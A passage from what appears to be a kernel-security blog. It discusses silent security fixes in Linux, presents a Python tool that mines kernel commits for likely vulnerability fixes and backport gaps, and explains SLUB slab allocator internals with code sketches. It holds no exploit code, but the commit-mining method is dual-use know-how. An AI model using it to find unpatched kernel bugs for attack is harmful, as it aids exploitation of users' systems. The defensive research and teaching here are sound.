That’s a lot of changes, right? The Linux kernel has guidelines and rules about submitting patches[2], but typically a commit is a logically cohesive set of changes (i.e. you won’t see a bunch of different fixes for different parts of the kernel in one commit, I hope anyway).

All these changes are organised into releases, which you can read about over at kernel.org[3], with new mainline kernels being released every 9-10 weeks.

Important to note is the concept of backporting, whereby bug fixes introduced in latest releases are applied to older kernel releases as well. There are several long-term maintenance (aka LTS) kernel releases, to designate support for older kernels.

on (silent) security fixes

There’s been lots of discussion surrounding security fixes and how they should be handled in relation to non-security fixes in the kernel, and this dialogue has understandably evolved over the years as our concept and understanding of security has too.

It’s a complex topic and, to oversimplify the arguments, at one extreme of the axis you may have folks saying all fixes should be treated equally, while at the other folks would argue security fixes need to be dealt with in a specific way, highlighting the impact etc.

A recurring topic in this space is the concept of “silent security fixes”, where a commit fixing a potentially exploitable vulnerability intentionally omits information regarding the security implications/reasons behind the fix.

This has been up for debate within the community since at least 2008, as we can see from this post on the Full Disclosure mailing list, titled “Linux’s unofficial security-through-coverup policy” by @spendergrsec.

Now as I mentioned earlier, a lot has changed since then, and our perception of security has come a long way. However, over the years there have still been cases of, at worst, silent security fixes or, at best, inconsistency in the handling of security fixes[5][6][7][8].

the plan

Putting this all together, I was interested in analysing Linux kernel commits in a somewhat automated way such that I could filter for security fixes and explore trends.

With full understanding that I’m no data scientist or software engineer, I whipped up a quick (and very hacky) tool to delve around a bit and have some fun.

[1] https://en.wikipedia.org/wiki/Linux_kernel
[2] https://www.kernel.org/doc/html/latest/process/submitting-patches.html
[3] https://www.kernel.org/category/releases.html
[4] https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community–welcome-to-add-more-for-fun
[5] https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/
[6] CVE-2022-1786 was a UAF leading to LPE, with no mention in the fix commit
[7] CVE-2022-2602 was a UAF leading to LPE, with no mention in the fix commit
[8] CVE-2021-41073 was disclosed by @chompie1337, although the fix commit has no mention of the exploitability and they also asked her to use a non-security related email for the “Reported-by” ack (as mentioned in @chompie1337’s article here)

Lica

get ready for some peak xdev-ctf-poc-tier code

Let’s talk about the tool! I’ll try to keep this brief, both for my dignity and your sanity. I put together this tool using Python to parse kernel commits and try to filter them for interesting security related fixes, as well as any interesting stats along the way.

sam4k/lica

Thanks to the kernel patch submission guidelines[1], there’s some level of consistency in what to expect a commit to contain, which helps us filter down the 34000 or so commits in the last 6 months to around 135 possible security fixes - neat!

Commit...... | Subsystem......... | Hits.................................... | CVE............. | Reporter.......................................... | Coverage.......
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
...
331cd9461412 | btrfs              | use-after-free                           |                  | Ye Bin                         | linux-5.15.90, linux-5.10.165, linux-5.4.230
...
cf6531d98190 | ksmbd              | use-after-free                           |                  | zdi-disclosures@trendmicro.com # ZDI-CAN-17816     | N/A            
...          
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Now For The Stats...
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
[+] 133 commits where matched from 2448 fixes, over 33487 commits.
[+] 36 / 133 listed a reporter.
[+] 2 / 133 mentioned a CVE.
[+] Breakdown by category:
|---- UAF: 95
|---- Races: 22
|---- Generic: 15
|---- Info Leak: 10
|---- Stack Overflow: 2
...
[+] Breakdown by module:
|---- mm: 11
|---- wifi: 10
|---- drm: 8
|---- media: 6
|---- net: 5
|---- cifs: 4
|---- io_uring: 4
...

output for the last 6 months or so, checking for coverage in latest 5.15, 5.10, 5.4 at the time

Above is a sample output from Lica, analysing kernel commits over the past 180 days. Here I’ve used a really basic approach of looking for fixes via keyword in the commit summary phrase and then further filtering those fixes by looking for hits in a dictionary of common bug classes/terminology, grouped by category.

A (slightly) more nuanced approach, looking at some of the “silent fixes” from earlier, would be to grep for typical causes for bug classes + the omission of bug classes. A simple example might be check.*len for missing length checks.
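To make that a bit more concrete, here’s a minimal sketch of the two-stage filter in Python. The keyword list, both dictionaries and the classify() helper are illustrative assumptions made up for this example, not Lica’s actual configuration or code:

```python
import re

# Stage 1: does the summary line look like a fix at all? (assumed keywords)
FIX_RE = re.compile(r"\b(fix|fixes|fixed|prevent|avoid)\b", re.IGNORECASE)

# Stage 2: bug-class dictionary, grouped by category (illustrative patterns only)
BUG_CLASSES = {
    "UAF": [r"use[- ]after[- ]free", r"\buaf\b"],
    "Races": [r"\brace\b", r"race condition"],
    "Info Leak": [r"info(rmation)? leak", r"uninit(ialized|ialised)?"],
}

# Cause-focused dictionary: no security terms, just typical root causes
BUG_CAUSES = {
    "Missing length check": [r"check.*len"],
    "Missing NULL check": [r"check.*null"],
}


def classify(summary, body="", dictionary=BUG_CLASSES):
    """Return the sorted categories a commit hits, or [] if it isn't a fix."""
    if not FIX_RE.search(summary):
        return []
    text = f"{summary}\n{body}"
    return sorted(
        category
        for category, patterns in dictionary.items()
        if any(re.search(p, text, re.IGNORECASE) for p in patterns)
    )
```

Swapping dictionary=BUG_CAUSES in for the default is all it takes to go from grepping for bug classes to grepping for likely root causes, which is the point: neither needs the commit to say anything about security.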

It’s worth noting that while we can use a basic dictionary or even filter by specific reporters (I’m looking at you ZDI), using a bug cause focused dictionary (that omits security-centric terms) yields just as many results.

While this yields more false positives, I think it reiterates that a determined attacker doesn’t need to just grep for “buffer overflow privesc” or a CVE to find potentially exploitable vulnerabilities, whether that’s by manually enumerating commits or by using an approach like this, which takes a few hours to put together. That makes me wonder why we have cases such as a researcher being asked to use a non-security related email for the “Reported-by” ack[2]??

Back to Lica, I also include a naive check to see if a particular kernel release has the patch, for checking older LTS kernels for backports (the Coverage column). There’s no doubt an easier and more reliable way to do this, but hey-ho, this did the trick for now.
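As a rough illustration of what such a check can look like (an assumption for this sketch, not necessarily how Lica does it), stable backports conventionally quote the mainline hash in their commit message, either as “commit <sha> upstream.” or “[ Upstream commit <sha> ]”. The helper names below are hypothetical, and the messages are passed in as plain strings so the example doesn’t depend on a git checkout:

```python
import re

# Stable backports conventionally reference the mainline commit in one of these forms.
UPSTREAM_RE = re.compile(
    r"^(?:commit ([0-9a-f]{40}) upstream\.?|\[ Upstream commit ([0-9a-f]{40}) \])\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def upstream_ids(message):
    """Extract every mainline hash referenced by a stable commit message."""
    return {a or b for a, b in UPSTREAM_RE.findall(message)}


def has_backport(mainline_sha, stable_messages):
    """True if any stable commit message references mainline_sha (full or abbreviated)."""
    sha = mainline_sha.lower()
    return any(
        full.lower().startswith(sha)
        for message in stable_messages
        for full in upstream_ids(message)
    )
```

Feeding has_backport() the commit messages from a stable branch gives a yes/no per release; it will miss backports that drop the upstream reference, so treat a “no” as “not found” rather than “not fixed”.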

Anyways, I tried to make this somewhat extensible and configurable, so I’ve chucked it up on GitHub in case anyone is interested in having a play with it. You’ve been warned about the quality!

[1] https://www.kernel.org/doc/html/latest/process/submitting-patches.html
[2] CVE-2021-41073 was disclosed by @chompie1337, although the fix commit has no mention of the exploitability and they also asked her to use a non-security related email for the “Reported-by” ack (as mentioned in @chompie1337’s article here)

Takeaways

Despite not getting to spend much time fine tuning or tweaking the tool to do some in-depth analysis, it’s been a fun little project and broaches an important discussion.

It does feel like, as a security researcher, there is still a lack of transparency and consistency in the processes and handling of security disclosures and fixes in the kernel.

Whether there’s intentional omission of security relevant information or just a difference in opinion on what constitutes relevant information, the end result is still a lack of consistency in how reported security issues are handled.

For example, I wrote about my experience disclosing a kernel vulnerability at the beginning of 2022[1]. While the process was a bit convoluted for me, after getting in touch with the right folks, I had no issues with communication and the commit referenced the reporter, CVE and vulnerability being fixed[2].

However, as I touched on earlier in the post, other researchers have had different experiences and the resulting patches can vary in their security relevant content.

On Disclosures

If you want to report a kernel vulnerability, you’ll typically end up staring at two pages:

The official kernel documentation on “Security Bugs”[3][4],
The linux-distros mailing list wiki page[5]

The tl;dr here is the kernel security team’s focus is solely on finding and applying a fix for security bugs. To allocate a CVE or inform vendors of the security impact (LPE, RCE etc.), you need to coordinate with the linux-distros list too.

There’s been a history of friction between the policies of the two bodies, with security researchers getting caught up between the two, the most recent instance being the public disclosure of CVE-2023-0179 over on oss-security[6].

Unfortunately I don’t fully understand the root cause of the misunderstanding. As Solar Designer points out, this seems to stem from a policy change made to accommodate the kernel security team[8], as part of a wider discussion on linux-distros policy last year[9], but I’m not entirely sure what policy this disclosure broke on the kernel documentation for “Security Bugs”[3].

Beyond highlighting the work required on the part of the researcher to make sure they follow the right steps and policies, this instance also shows where this rift might end up if things carry on the way they are, with Solar Designer commenting:

It may well be the last straw that will result in Linux kernel documentation getting updated so that reporters would not be instructed to contact linux-distros anymore (or would even be instructed not to?) On one hand, this is bad. On the other, everyone is tired of the inconsistencies and the drama.

Solar Designer then goes on to explain a potential solution to ensure oss-security still keeps up-to-date with kernel security issues if things do go south:

I suppose we (oss-security community?) could want to setup a crawler detecting likely security issues on Linux kernel mailing lists and among Linux kernel commits (including branches). This could detect even more issues than are being brought to linux-distros and oss-security now.

While somewhat ironic given the topic of this post (not that my code is fit for scale lol), it’s a shame that there’s still discord regarding the handling of kernel security issues when this is a debate that’s been going on for so many years at this point.

I don’t have all the information or experience to suggest any solutions for a decades-long pain point, but I do hope there’s one out there and we can find it soon.

Transparency and consistency surrounding these processes help to encourage researchers to participate in coordinated vulnerability disclosure for kernel vulns. Having more clarity around the handling and state of security fixes should also help vendors and such too, as well as help us as a community to continue to progress with regards to our attitude and approach to security.

[1] https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/
[2] https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216
[3] https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html
[4] small note, the first result on google for me is actually an older copy, from the 4.14 kernel which omits some clarity found in the latest versions
[5] https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists
[6] https://seclists.org/oss-sec/2023/q1/22
[7] https://www.openwall.com/lists/oss-security/2022/05/24/1
[8] https://seclists.org/oss-sec/2022/q2/99
[9] https://seclists.org/oss-sec/2022/q4/221

Conclusion

Well, this one was a bit of a change of pace for me and was a step out of my comfort zone, considering I normally focus on more objective, technical subjects. That probably explains why it took so much longer to write!

Hopefully I didn’t stir the pot too much; my goals for this post were to share some takeaways from a project that otherwise would have been relegated to the recycling bin as well as shed some light on a relevant and important topic within the community.

Despite my criticism of the current status quo, I have a lot of respect for the time and effort put in by all of those involved in the Linux kernel community.

Fingers crossed this was interesting for those of you that made it this far, but don’t fear, I’ve got some more technical posts lined up for both kernel exploitation and internals!

exit(0);

Linternals: The Slab Allocator

sam4k — Wed, 09 Nov 2022 15:04:00 +0000

The monthly blog schedule has gone somewhat awry, but fear not, today we’re diving back into our Linternals series on memory allocators!

I know it’s been a while, I’ve been sidetracked with the new job and some cool personal projects, so let’s quickly highlight what we covered last time:

what we mean by memory allocators
key memory concepts such as pages, page frames, nodes and zones
piecing this together to explain the underlying allocator used by the Linux kernel, the buddy (or page) allocator, as well as touching on its API, pros and cons

This time we’re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and its various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.

0x03 The Slab Allocator
Next Time!

0x03 The Slab Allocator

The slab allocator is another memory allocator used by the Linux kernel and, as we touched on last time, “sits on top of the buddy allocator”.

What I mean by this, is that while the slab allocator is another kernel memory allocator it doesn’t replace the buddy allocator. Instead it introduces a new API and features for kernel developers (which we’ll cover soon), but under the hood it uses the buddy allocator too.

So why use the slab allocator? Well, last time we touched on some of the issues and drawbacks with the buddy allocator. The purpose of the slab allocator is to[1]:

reduce internal fragmentation,
cache commonly used objects,
better utilise the hardware cache by aligning objects to the L1 or L2 caches

So while the buddy allocator excels at allocating large chunks of physically contiguous memory, the slab allocator provides better performance to kernel developers for smaller and more common allocations (which happen more often than you might think!).

Before we dive into some more detail and explain how the kernel’s slab allocator achieves this, I should highlight that the term “slab allocator” refers to a generic memory management implementation.

The Linux kernel actually has three such implementations: SLAB[2], SLUB and SLOB. SLUB is what you’re likely to see on modern desktops and servers[3], so we’ll be focusing on this implementation throughout this post, but I’ll touch on the others later.

If you’re interested in its origins, slab allocation was first introduced by Jeff Bonwick back in the 90’s and you can read his paper “The Slab Allocator: An Object-Caching Kernel Memory Allocator” over on USENIX.[4] [5]

[1] https://www.kernel.org/doc/gorman/html/understand/understand011.html
[2] Note that “slab allocator” != “slab” != “SLAB”, confusing ik
[3] SLUB has been the default since 2.6.23 (~2007), so by likely I mean very likely
[4] http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps
[5] Thanks @bsmaalders@mas.to for the reminder to include this here :)

The Basics

At a high level, there’s 3 main parts to the SLUB allocator: caches, slabs and objects.

As we can see, these form a pretty straightforward hierarchy. Objects (i.e. stuff being allocated by the kernel) of a particular type or size are organised into caches.

Objects belonging to a cache are further grouped into slabs, which will be of a fixed size and contain a fixed number of objects.

Objects in this context are just allocations of a particular size. For example, when a process opens a seq_file[1] in Linux, the kernel will allocate space for [struct seq_operations](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/seq_file.h#L32) using the slab allocator API. This will be a 32 byte object.

Among other things, the cache will keep tabs on which slabs are full, which slabs are partially full and when slabs are empty. Free objects within a slab will form a linked list, pointing to the next free object within that slab.

So when the kernel wants to make an allocation via the SLUB allocator, it will find the right cache (depending on type/size) and then find a partial slab to allocate that object.

If there are no partial or free slabs, the SLUB allocator will allocate some new slabs via the buddy allocator. Yep, there it is, we’re full circle now. The slabs themselves are allocated and freed using the buddy allocator we touched on last time.

Knowing this we can deduce that each slab is at least PAGE_SIZE bytes and is physically contiguous; we’ll touch more on the details in a bit!
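If it helps to see the hierarchy as code, here’s a toy model in Python. It’s a sketch under some loud assumptions: 4 KiB pages, order 0 slabs, no per-CPU state, and class and field names (Cache, Slab, next_free) invented for this example rather than taken from the kernel:

```python
PAGE_SIZE = 4096  # assumed 4 KiB pages


class Slab:
    """A fixed-size run of pages carved into equally sized object slots."""

    def __init__(self, object_size, order=0):
        self.capacity = (PAGE_SIZE << order) // object_size
        # Free slots form a chain: the slab holds the first, each slot names the next.
        self.next_free = {i: i + 1 for i in range(self.capacity - 1)}
        self.next_free[self.capacity - 1] = None
        self.freelist = 0
        self.inuse = 0

    def alloc(self):
        slot = self.freelist
        self.freelist = self.next_free.pop(slot)
        self.inuse += 1
        return slot


class Cache:
    """Groups slabs holding objects of one size, e.g. a toy kmalloc-32."""

    def __init__(self, name, object_size):
        self.name, self.object_size = name, object_size
        self.partial, self.full = [], []

    def alloc(self):
        if not self.partial:
            # No partial slab left: this is where SLUB would ask the buddy allocator.
            self.partial.append(Slab(self.object_size))
        slab = self.partial[0]
        slot = slab.alloc()
        if slab.freelist is None:
            self.full.append(self.partial.pop(0))
        return slab, slot
```

With 32 byte objects and an order 0 slab, each slab holds 4096 / 32 = 128 objects, so in this model the 129th allocation is the one that forces a new slab.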

[1] https://www.kernel.org/doc/html/latest/filesystems/seq_file.html

Data Structures

In the last section we covered slab allocator 101 - a simplified overview of caches, slabs and objects. Surprise, surprise: the kernel implementation is a tad more complex!

I think the approach I’ll take here is to just dive right into the data structures behind the SLUB implementation and we’ll expand from there and see how it goes?!

So let’s give a quick overview of some of the kernel data structures we’re interested in when looking at the SLUB implementation:

[struct kmem_cache](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90): represents a specific cache of objects, storing all the metadata and info necessary for managing the cache
[struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48): this is a per-cpu structure which represents the “active” slab for a particular kmem_cache on that CPU (I’ll explain this soon, dw!)
[struct kmem_cache_node](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741): this is a per-node (NUMA node) structure which tracks the partial and full slabs for a particular kmem_cache on that node that aren’t currently “active”
[struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9): this structure, as you probably guessed, represents an individual slab and was introduced in 5.17[1] (previously this information would be accessed directly from [struct page](https://elixir.bootlin.com/linux/v5.17/source/include/linux/mm_types.h#L72), but more on that soon!)

struct kmem_cache

struct kmem_cache {
	struct kmem_cache_cpu __percpu *cpu_slab;
	slab_flags_t flags;
	unsigned long min_partial;
	unsigned int size;
	unsigned int object_size;
	struct reciprocal_value reciprocal_size;
	unsigned int offset;	
#ifdef CONFIG_SLUB_CPU_PARTIAL
	unsigned int cpu_partial;
	unsigned int cpu_partial_slabs;
#endif
	struct kmem_cache_order_objects oo;

	/* Allocation and freeing of slabs */
	struct kmem_cache_order_objects min;
	gfp_t allocflags;	
	int refcount;		/* Refcount for slab cache destroy */
	void (*ctor)(void *);
	...
	const char *name;	/* Name (only for display!) */
	struct list_head list;	/* List of slab caches */
	...
	struct kmem_cache_node *node[MAX_NUMNODES];
};

comments stripped for redundancy, from /include/linux/slub_def.h

As you might expect from the structure that underpins the SLUB allocator’s cache implementation, there’s a lot to unpack here! Let’s break down the key bits.

name stores the printable name for the cache, e.g. seen in the command slabtop (we’ll cover introspection more later). Nothing wild here.

object_size is the size, in bytes, of the objects (read: allocations) in this cache excluding metadata. Whereas size is the size, in bytes, including any metadata. Typically there is no additional metadata stored in SLUB objects, so these will be the same.

flags holds the flags that can be set when creating a kmem_cache object. I won’t go into detail, but these can be used for debugging, error handling, alignment etc. [2]

[struct kmem_cache_order_objects](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L83) oo is a neat word-sized structure that simply contains one member: unsigned int x.

This is used to store both the order[3] of the slabs in this cache (in the upper bits) and the number of objects that they can contain (in the lower bits). There are then helpers to fetch either of these values ([oo_objects()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L419) and [oo_order()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L414)).
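The packing is simple enough to sketch in a few lines. This is a Python rendition for illustration: the 16-bit shift mirrors OO_SHIFT in mm/slub.c as of v6.0, while the 4 KiB PAGE_SIZE is an assumption about the target system:

```python
OO_SHIFT = 16                  # as in mm/slub.c (v6.0)
OO_MASK = (1 << OO_SHIFT) - 1
PAGE_SIZE = 4096               # assumed 4 KiB pages


def oo_make(order, size):
    """Pack the slab order and the objects-per-slab count into one integer."""
    objects = (PAGE_SIZE << order) // size
    return (order << OO_SHIFT) + objects


def oo_order(x):
    """Upper bits: the page order of each slab."""
    return x >> OO_SHIFT


def oo_objects(x):
    """Lower bits: how many objects fit in a slab of that order."""
    return x & OO_MASK
```

For example, an order 1 slab (two pages) of 512 byte objects holds 16 of them, so oo_make(1, 512) comes out as 0x10010.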

min, I believe, stores the minimum oo counts for slabs without any debugging or extra metadata enabled. That way, when enabling those features, the kernel can compare whether oo has increased from min and decide whether to still enable them if desired. As far as I can tell, it also doubles as the fallback when allocating a slab at the preferred oo order fails.

reciprocal_size is, well, the reciprocal of size. If you also don’t math, this is basically the properly calculated value of 1/size. This is used by [obj_to_index()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L179) for determining the index of an object within a slab.
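For the curious, the trick is to swap a (slow) division for a multiply and a couple of shifts. Below is a Python rendition of the kernel’s reciprocal_value() and reciprocal_divide() helpers as I understand them, with Python’s big integers masked down to 32 bits; the obj_to_index() here is a simplified stand-in that takes plain integers rather than kernel structures:

```python
U32 = 0xFFFFFFFF


def reciprocal_value(d):
    """Precompute (m, sh1, sh2) so division by d becomes a multiply and two shifts."""
    l = (d - 1).bit_length()                      # equivalent of fls(d - 1)
    m = ((1 << 32) * ((1 << l) - d)) // d + 1
    return m & U32, min(l, 1), max(l - 1, 0)


def reciprocal_divide(a, r):
    """Compute a // d for a 32-bit a, using the precomputed reciprocal r of d."""
    m, sh1, sh2 = r
    t = (a * m) >> 32
    return ((t + ((a - t) >> sh1)) & U32) >> sh2


def obj_to_index(slab_base, obj_addr, reciprocal_size):
    """Index of an object within its slab: (obj - base) / size, without dividing."""
    return reciprocal_divide(obj_addr - slab_base, reciprocal_size)
```

So for a cache of 96 byte objects, the object sitting 480 bytes into its slab comes back as index 5, with the reciprocal computed once per cache rather than a division per lookup.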

list is a linked list of all struct kmem_cache on the system and is exported as [slab_caches](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L258).

So far we’ve covered some of the main metadata, but now we’ll dive into some of the members involved in actually facilitating allocations.

cpu_slab is a per CPU reference to a [struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48). This means that under-the-hood this is an array of sorts and each CPU uses a different index[4], thus having a reference to a different [struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48).

We’ll touch more on this structure soon, but it represents the “active” slab for a given CPU. This means that any allocations made by a CPU will come from this slab (or at least this slab will be checked first!).

node[MAX_NUMNODES] on the other hand is a per node reference to a [struct kmem_cache_node](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741). This structure holds information on all the other slabs (partial, full etc.) within this node and is the next port of call after cpu_slab.

min_partial defines the minimum number of slabs to keep in a node’s partial list, even if they’re empty. Typically when a slab is empty, it will be freed back to the buddy allocator, unless there are fewer than min_partial slabs in the partial list!

offset stores the “free pointer offset”. My educated guess is that this is the byte offset into an object where the free pointer (i.e. pointer to next free object in the slab) is found. Historically this was zero, but in recent kernels (including the 6.0 source linked here) the pointer typically lives near the middle of the object, and it can move again with debugging/flag tweaks.

[CONFIG_SLUB_CPU_PARTIAL](https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html) enables [struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48) to not just track a per CPU “active” slab but also have its own per CPU partial list. After explaining the roles of cpu_slab and node[] the benefits should become clearer.

cpu_partial and cpu_partial_slabs define the number of partial objects and partial slabs to keep around.

allocflags allows a cache to define GFP flags[5] to apply to allocations, which can determine allocator behaviour. These can also be added through the allocation API.

ctor() lets the cache define a constructor to be called on the object during [setup_object()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L1806) which is called when a new slab is allocated.

And that’s more or less all the key fields in kmem_cache! Hopefully that provided some additional context around the main structure underpinning the cache implementation, and we can dive into the next two with enough context to get along.

There’s of course some fields I missed out, associated with debugging, mitigations or other bits and pieces that probably didn’t justify the bloat but I may come back to some time.

struct kmem_cache_cpu

struct kmem_cache_cpu {
	void **freelist;	/* Pointer to next available object */
	unsigned long tid;	/* Globally unique transaction id */
	struct slab *slab;	/* The slab from which we are allocating */
#ifdef CONFIG_SLUB_CPU_PARTIAL
	struct slab *partial;	/* Partially allocated frozen slabs */
#endif
	local_lock_t lock;	/* Protects the fields above */
#ifdef CONFIG_SLUB_STATS
	unsigned stat[NR_SLUB_STAT_ITEMS];
#endif
};

/include/linux/slub_def.h

Bet you’re breathing a sigh of relief at that 12 liner, eh? I know I am writing this lol. Anyway, let’s dive into [struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48), which tracks an active slab (and partial list) for a specific CPU.

freelist points to the next available (free) object in the active slab, slab. This is a void ** as each free object contains a pointer to the next free object in the slab.

slab points to the [struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9) representing the “active” slab, i.e. the slab from which we’re allocating for this CPU. We’ll explore this more soon.

partial is the per cpu partial list we mentioned earlier, when [CONFIG_SLUB_CPU_PARTIAL](https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html) is enabled (it should be on server/desktop). This points to a list of partially full [struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9).

u and me both

Okay so let’s move away from dry member descriptions and actually look at some examples of how SLUB might serve an allocation request!

In this example let’s say a kernel driver has requested to allocate a 512 byte object via the SLUB allocator API (spoiler: it’s kmalloc()), from the general purpose cache for 512 byte objects, kmalloc-512. There’s a couple of ways this can go down!

If cache->cpu_slab->slab has several free objects, things are fairly simple. The address of the object pointed to by cache->cpu_slab->freelist will be returned to the caller.

The freelist will be updated to point to the next free object in cache->cpu_slab->slab and relevant metadata will be updated regarding this allocation.

the addr of new obj is returned to the caller
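Here’s that fast path as a small Python simulation, where a bytearray stands in for the slab’s memory and each free object stores the address of the next free object inside itself. The free pointer offset of 0, the dict standing in for kmem_cache_cpu and the function names are all assumptions for the sake of the sketch, and it ignores hardening such as freelist pointer obfuscation:

```python
import struct

OBJ_SIZE = 512     # kmalloc-512
FP_OFFSET = 0      # assumed free pointer offset within each object, chosen for simplicity
NULL = 0


def init_slab(base, nr_objects):
    """Build slab memory where every free object stores the address of the next one."""
    mem = bytearray(OBJ_SIZE * nr_objects)
    for i in range(nr_objects):
        nxt = base + (i + 1) * OBJ_SIZE if i + 1 < nr_objects else NULL
        struct.pack_into("<Q", mem, i * OBJ_SIZE + FP_OFFSET, nxt)
    return mem


def fast_path_alloc(cpu_slab, mem, base):
    """Pop the head of the per-CPU freelist and advance it to the next free object."""
    obj = cpu_slab["freelist"]
    if obj == NULL:
        return None                      # slow path territory, not modelled here
    (nxt,) = struct.unpack_from("<Q", mem, obj - base + FP_OFFSET)
    cpu_slab["freelist"] = nxt
    cpu_slab["tid"] += 1                 # stand-in; the real tid scheme is more involved
    return obj
```

Note how the only “metadata” needed to find the next free object lives inside the free objects themselves, which is also why corrupting a freed object can be so interesting from an exploitation perspective.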

Before we dive into other allocation scenarios, let’s cover one more structure (sorry)!

struct kmem_cache_node

struct kmem_cache_node {
	spinlock_t list_lock;

	unsigned long nr_partial;
	struct list_head partial;
#ifdef CONFIG_SLUB_DEBUG
	atomic_long_t nr_slabs;
	atomic_long_t total_objects;
	struct list_head full;
#endif
};

/mm/slab.h

We’re almost there, folks! This structure tracks the partially full (partial) and full slabs for a particular node. We’re talking about NUMA nodes here, which we very briefly touched on in the last post.

The tl;dr here is many CPUs can belong to one node. You can see your node information on Linux with the command numactl -H, which will let you know how many nodes you have and the CPUs that belong to each node!

partial is a linked list of partially full struct slabs, the number of which is tracked by nr_partial. This is the count that gets compared against kmem_cache->min_partial, as we touched on earlier, when deciding whether an empty slab can be freed.

full is a linked list of full struct slabs. Not much else to say about that!

nr_slabs is the total number of slabs tracked by this kmem_cache_node. Similarly, total_objects tracks the total number of objects those slabs can hold, whether allocated or free.

So now we have more context about the internal SLUB structures, let’s take what we know and apply that to a different allocation path, using the scenario from before.

If the new obj returned to the caller is the last free object in cache->cpu_slab->slab, the “active” slab is moved into its node’s full list (where full slabs are being tracked, see CONFIG_SLUB_DEBUG above). The first slab from cache->cpu_slab->partial is then made the “active” slab.
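That hand-over can be sketched as follows. This is a deliberately simplified Python model of the scenario just described: plain dicts and lists stand in for kmem_cache_cpu, kmem_cache_node and struct slab, the names are made up for the example, and the timing and bookkeeping in the real allocator differ in the details:

```python
def alloc(cpu, node):
    """Allocate one object from a toy per-CPU cache state.

    cpu:  {"slab": active slab or None, "partial": [slabs]}
    node: {"partial": [slabs], "full": [slabs]}
    Each slab is {"free": [object addresses]}.
    """
    slab = cpu["slab"]
    if slab is None:
        return None                       # would need a node partial slab or a fresh slab
    obj = slab["free"].pop(0)
    if not slab["free"]:
        # That was the last free object: park the slab as full and
        # promote the first CPU partial slab to be the new active slab.
        node["full"].append(slab)
        cpu["slab"] = cpu["partial"].pop(0) if cpu["partial"] else None
    return obj
```

Once the CPU partial list runs dry too, the next stops would be the node’s partial list and finally a brand new slab from the buddy allocator, which this sketch leaves out.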

As you can imagine, there’s many potential allocation paths depending on the internal cache state. Similarly, there are multiple paths when an object is freed.

I won’t walk through all the possible cases here, but hopefully this post provides enough details to fill in the blanks!

struct slab

struct slab {
	unsigned long __page_flags;

	union {
		struct list_head slab_list;
		struct rcu_head rcu_head;
#ifdef CONFIG_SLUB_CPU_PARTIAL
		struct {
			struct slab *next;
			int slabs;	/* Nr of slabs left */
		};
#endif
	};
	struct kmem_cache *slab_cache;
	/* Double-word boundary */
	void *freelist;		/* first free object */
	union {
		unsigned long counters;
		struct {
			unsigned inuse:16;
			unsigned objects:15;
			unsigned frozen:1;
		};
	};
	unsigned int __unused;

	atomic_t __page_refcount;
#ifdef CONFIG_MEMCG
	unsigned long memcg_data;
#endif
};

/mm/slab.h

Last, but certainly not least, on our SLUB struct tour is struct slab. This structure, unsurprisingly, represents a slab. Seems pretty straightforward, right?

Well, despite its benign look, struct slab is hiding something. It’s actually a struct page in disguise. Wait, what?

Until recently (5.17)[6], a slab’s metadata was accessed directly via a union in the struct page which represented the slab’s memory[7].

While that slab information is still stored in struct page, struct slab was created as part of an effort to decouple things from struct page, with the aim of moving the information out of struct page entirely in the future.

Anyway, with that little bit of excitement out the way, let’s see what some of these fields within struct page, uh I mean struct slab are saying!

The first union can contain several things: slab_list, the linked list this slab belongs in, e.g. the node’s full list; rcu_head, used when the slab is freed via RCU; or a struct for CPU partial slabs, where next is the next CPU partial slab and slabs is the number of slabs left in the CPU partial list.

slab_cache is a reference to the struct kmem_cache this slab belongs to.

freelist is a pointer to the first free object in this slab.

Then we have another union, this time used to view the same data in different ways. counters is used to fetch the counters within the struct easily, whereas the struct allows granular access to each of the counters: inuse, objects, frozen.

objects is a 15-bit counter defining the total number of objects in the slab, while inuse is a 16-bit counter used to track the number of objects in the slab being used (i.e. have been allocated and not freed).
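To illustrate the “same data, different views” idea, here’s a Python sketch that packs the three bitfields into the one integer you’d see through counters. The bit positions assume the usual little-endian layout where the first declared bitfield takes the lowest bits (as with GCC on x86-64); the helper names are invented for the example:

```python
INUSE_BITS, OBJECTS_BITS = 16, 15   # widths from struct slab


def pack_counters(inuse, objects, frozen):
    """Combine the three bitfields into the single integer seen through `counters`."""
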